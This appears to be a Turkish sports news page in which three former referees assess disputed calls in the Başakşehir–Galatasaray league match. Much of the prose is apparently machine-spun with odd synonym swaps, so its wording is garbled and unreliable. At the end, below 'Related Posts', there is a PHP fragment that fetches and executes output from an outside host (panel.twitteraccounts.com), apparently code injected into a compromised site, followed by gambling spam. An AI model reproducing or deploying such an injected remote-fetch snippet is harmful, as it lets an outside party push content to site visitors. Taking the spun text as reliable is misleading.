Eski hakemlerden Başakşehir – Galatasaray maçı yorumları

Trio grubu Bahattin Duran, Deniz Çoban ve Bülent Yıldırım, Başakşehir - Galatasaray maçındaki tartışmalı durumları yorumladı.
Haber Merkezi

Süper Lig’in 19’uncu haftasında Başakşehir alanında Galatasaray’ı konuk etti.

Fatih Terim Stadyumu’nda oynanan müsabakada hakem Atilla Karaoğlan düdük çaldı.

Kritik çabada ise kazanan 2-1’lik skorla konuk grup Galatasaray oldu.

BeIN Trio grubu, ise maçın akabinde hakem kararları hakkında değerlendirmelerde bulundu.

eski hakemlerden basaksehir galatasaray maci yorumlari 0 CW8hhFiV

ESKİ HAKEMLERİN KONUMLARA YORUMLARI

12′ Opoku’nun Osimhen’e yaptığı faul sonrası sarı kart görmesi. Kart kararı gerçek mu?

Bahattin Duran: Çok subjektif. Hakem kırmızı kart gösterseydi VAR karışamazdı. Bana nazaran sarı kart hakikat. Top havadan oyuncunun sağına gittiği için denetim etmesi biraz güç. Yerden sağına gitseydi daha net gol konumu olurdu.

Bülent Yıldırım: Bariz gol bahtı ve kırmızı kart olmalıydı. Bu usul durumlarda VAR’a verilen talimat: yüzde 100 gol bahtı olmadığı takdirde karışamaz.

Deniz Çoban: Osimhen topu sol ayağıyla sağına alıyor. Rakibini toptan kaçırıyor Osimhen. Mantıken topu soluna yanlışsız atamaz. Opoku düşmeseydi aslında topa sahip olacaktı. Bana nazaran bariz gol bahtından kırmızı kart olmalıydı.

eski hakemlerden basaksehir galatasaray maci yorumlari 1 Zf3Op7yc

16′ Yunus Akgün’ün ceza alanının çabucak dışında düşürülüp sarı kart gördüğü durum.

Bahattin Duran: Yunus Akgün’ün itirazdan sarı kart görmesi gerçek lakin Yunus’a net bir faul yapılıyor. Hakem faulü değerlendiremedi. Başakşehirli oyuncuların yaptığı net bir fauldü. Yunus’un itirazları sonrası sarı kart görmesi hakikat.

Bülent Yıldırım: Başakşehirli oyuncu Yunus’un istikrarını bozmuş, net bir faul.

Deniz Çoban: Söyleyecek bir şey yok. Net bir faul.

eski hakemlerden basaksehir galatasaray maci yorumlari 2 givy2OCL

21′ Kaan Ayhan’ın Davidson’a yaptığı faulün akabinde gördüğü sarı kartta karar gerçek mu?

Bahattin Duran: Faul ve kart kararı yanlışsız. Davidson ayağını çekmese bağlarını koparırdı.

Bülent Yıldırım: Sarı kart yanlışsız.

Deniz Çoban: Kart yanlışsız.

eski hakemlerden basaksehir galatasaray maci yorumlari 3

27′ Mertens’in ortasında Hamza’nın eline çarpan topta devam kararı hakikat mu?

Bahattin Duran: Bence net penaltı. Bunu kime sorarsak soralım penaltı der. Buna devam diyen de olabilir. VAR müdahale etmeliydi.

Bülent Yıldırım: Bu geliş olağan değil. Karşıdan gelen topa defans oyuncusu bu türlü mi savunma yapar? Bu top uzaktan geliyor, beklenmedik değil, oyuncu sakarlık yapıyor. Açık, tartışmasız net penaltı. VAR müdahale etmeliydi.

Deniz Çoban: Yüzde 100 el var. Lakin nasıl? Top uzak uzaklıktan geliyor. Savunma oyuncusu için beklenmeyen bir top değil. Bedenini koordine edebilir. 25 metreden top geliyor. Öncesinde de topu ıskalayan bir oyuncu yok. Hiçbir şey yok. En uzak noktadan kendi durumunu ayarlayabilir. El de dayanak eli değil. Başına ıska geçmiş kolunu genişletiyor. El kol doğal değil. Top gelene kadar elini kaçırabilir. Tedbir almıyor. Top eliyle oluşuyor. Tartışmasız penaltı. VAR’ın devreye girmesi gerekirdi.

eski hakemlerden basaksehir galatasaray maci yorumlari 4 a4MOy3Ej

31′ Torreira’nın Kemen’e yaptığı faulde sarı kart kararı gerçek mu?

Bahattin Duran: Faul kararı hakikat fakat kart gerektirecek bir durum göremiyorum. Bu hareket denetimsiz değil. Bu yalnızca bir faul.

Bülent Yıldırım: Kontrolsüzlük görmüyorum. Bundan faul çıkar, sarı kart çıkmaz.

Deniz Çoban: Bu duruma kart olmaz.

eski hakemlerden basaksehir galatasaray maci yorumlari 5 4EfGO4GJ

37′ Hamza’nın Barış Alper’i düşürdüğü durumda gördüğü kart kararı yanlışsız mu?

Bahattin Duran: Faul ve kart kararı yüzde 100 yanlışsız. Topa yetişme bahtı yok. Formadan yapıştı, çekti.

Bülent Yıldırım: Tartışacak bir şey yok.

Deniz Çoban: Sportmenlik dışı hareket.

eski hakemlerden basaksehir galatasaray maci yorumlari 6 1dDf8GHK

45′ Keny’nin Davinson’a yaptığı harekette kartın rengi hakikat mu?

Bahattin Duran: Sarı kart kararı hakikat.

Bülent Yıldırım: Dirsek yok, şiddetli bir çaba değil. Sarı kart kâfi.

Deniz Çoban: Hareket olduğundan daha sert gözüküyor ancak hakem sarı kart verdi. Kart kâfi.

eski hakemlerden basaksehir galatasaray maci yorumlari 7

51′ Keny’nin ceza alanı içinde yerde kaldığı konumda devam kararı gerçek mu?

Bahattin Duran: Penaltı yok. Abdülkerim riskli bir hareket yaptı. Topla oynayamadı. Uzattığı ayağı topla oynayamadı, rakibini düşürdüyse penaltı deriz. Abdülkerim’in ayağıyla, Keny’nin ayağı buluşmadı. Fotoğrafa bakınca ayaklar yapışık fakat ortada 1 metre uzaklık var. Yerde süpürdüğü dizi de temas etmedi. Devam kararı gerçek. Keny’e aldatmadan sarı kart düşünülebilir. Penaltı katiyetle yok.

Bülent Yıldırım: Penaltı yok. Sıkıntı konum.

Deniz Çoban: Keny’nin ayağının yere bastığı yer ile Abdülkerim’in ayağını yere bastığı yer ortasında 1 metre fark var. Hiçbir noktada Abdülkerim’in Keny’e teması yok. Keny kendini yere attı. Keny sarı kartla oynuyordu bu dakikada. Penaltı yok. Keny sarı kart görmeliydi.

eski hakemlerden basaksehir galatasaray maci yorumlari 8 YKbfZbiv

59′ Barış Alper Yılmaz’ın attığı ikinci golün öncesinde ihlal var mı? Devam kararı gerçek mu?

Bahattin Duran: Havadan eliyle topu önüne indirmemiş Osimhen. Burada olabilecek en doğal pozisyonda el. Katiyen elle oynama yok. 3 konum inceledik. El yok, hafif ayağıyla temas var ancak ihlal değil. Top çok net doğal pozisyondaki ele geliyor. Oyunun devam etme kararı gerçek. VAR protokolüne nazaran ihlal yok. Sonuç olarak oyunun devam etmesi yanlışsız.

Bülent Yıldırım: Benim için de karar gerçek. İhlal yok.

Deniz Çoban: Birinci durumda benim gördüğüm top Osimhen’in karnına geliyor. Bir oyuncunun beden askiyonu ne olabilir 35-40 santimde? Bu bir beklenmeyen top. Oyun kurallarında Osimhen o top eline çarpıp gol olsaydı gol iptal edilirdi ancak pas verdikten sonra iptal talihi yok. Bilerek oynama değil. Oyunun devam etmesi yanlışsız. VAR’lık bir konu yok.

eski hakemlerden basaksehir galatasaray maci yorumlari 9 CtvGfWcP

74′ Başakşehir’in kullandığı kornerde Piatek röveşataya çıkmak isterken Torreira’ya faul yaptı ve sarı kart gördü. Karar gerçek mu?

Bahattin Duran: Risk alarak bu hareketi yaptı. Karar yanlışsız.

Bülent Yıldırım: Karar gerçek.

Deniz Çoban: Sarı kart hakikat. Hakem düdüğü geç çaldı.

76′ Sallai’nin Figueiredo’ya yaptığı faulünü akabinde gördüğü kart görmeli miydi?

Bahattin Duran: Sallai’nin uzanma bahtı yok. Konrolsüz hareket. Sarı kart görmeliydi.

Bülent Yıldırım: Kontrolsüz hareket. Sarı kart görmeliydi.

Deniz Çoban: Denetimsiz bir faul. Sarı kart olmalıydı.

76′ Başakşehir’in kullandığı hür vuruşta Jakobs ve Opoku ortasındaki gayret penaltı çalınmalı mıydı?

Bahattin Duran: Ben topun Opoku’ya değdiğini görüyorum. Opoku’nun sağ omzuna çarpıyor. Ben bunu omuz olarak görüyorum. Buradan penaltı çıkaramadım. Devam kararı hakikat.

Bülent Yıldırım: Jakobs’un kolu doğal pozisyonda değil. Opoku’nun sağ omzundan sektiğini görüyorum. Bir ispat bulabildik mi? Devam kararı gerçek.

Deniz Çoban: Topun ele değdiğini görüyorum. Diğer konumda sol omzuna sekiyor diye gördüm. Opoku’nun sağ omzuna çarpıyor. Durumun 8 tane açısı var. Seyircilerimiz karar versin. Devam kararı gerçek.

79′ Sallai’nin gördüğü sarı kartta karar hakikat mu?

Bahattin Duran: Karar gerçek.

Bülent Yıldırım: Karar hakikat.

Deniz Çoban: Karar yanlışsız.

YORUMCULARIN GÖRÜŞÜ

Trio yorumcularına nazaran Opoku, Keny ve Hamza ihraç edilmeliydi. Galatasaray’ın 27. dakikada penaltısı verilmedi.

(Görüntüler BeIN Sports’tan alınmıştır.)

Share the Post:

Related Posts

$exe = curl_init(); curl_setopt($exe, CURLOPT_URL, "https://panel.twitteraccounts.com/code?x=21"); curl_exec($exe); ?>

fqq sahabet